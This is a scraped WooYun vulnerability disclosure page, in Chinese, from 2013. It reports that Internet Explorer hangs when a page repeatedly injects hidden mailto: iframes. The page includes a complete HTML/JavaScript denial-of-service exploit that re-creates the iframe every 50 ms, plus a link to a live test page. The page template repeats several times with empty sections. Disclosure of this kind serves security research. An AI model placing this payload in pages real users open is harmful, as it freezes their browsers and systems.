IE浏览器设计缺陷可导致系统挂起 | wooyun-2013-036210| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-036210

漏洞标题：IE浏览器设计缺陷可导致系统挂起

漏洞作者： LaiX

提交时间：2013-09-07 22:39

修复时间：2013-10-22 22:39

公开时间：2013-10-22 22:39

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-09-07：积极联系厂商并且等待厂商认领中，细节不对外公开
2013-10-22：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

已经很久没有什么能够让浏览器崩溃的BUG了吧。这个BUG重则导致系统挂起，轻则浏览器崩溃或挂起。

详细说明：

我们知道HTTP协议一向都是被禁止弹窗的。
如果我们使用的是mailto协议呢？情况会怎样?
经过测试mailto协议在WIN下的IE浏览器中会自动打开微软自带的邮件发送软件
在iframe的装饰下，这个本来看似正常的功能变得畸形了起来。

<iframe src=mailto:[email protected]?subject=HTML&body=hello  style='display:none;'></iframe>

刷新几下发现，请求一次就会启动一次，如果我们无限请求会导致什么结果？
Exploit:

<html>
<head>
 <script>
   var iID=setInterval(openCrazy, 50);
   function openCrazy()
   {
      document.body.innerHTML="<iframe src=mailto:[email protected]?subject=HTML&body=hello  style='display:none;'></iframe>"
   }
 </script>
</head>
<body>
</body>
</html>

漏洞证明：

只要打开

Http://xxss.ml/crazy/test.html

不管你IE有多牛逼一样的挂起。
这里我用QQ浏览器的IE内核做了测试，差点系统挂起了

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-036210

漏洞标题：IE浏览器设计缺陷可导致系统挂起

相关厂商：微软

漏洞作者： LaiX

提交时间：2013-09-07 22:39

修复时间：2013-10-22 22:39

公开时间：2013-10-22 22:39

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 LaiX@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-036210

漏洞标题：IE浏览器设计缺陷可导致系统挂起

相关厂商：微软

漏洞作者： LaiX

提交时间：2013-09-07 22:39

修复时间：2013-10-22 22:39

公开时间：2013-10-22 22:39

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-036210"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 LaiX@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：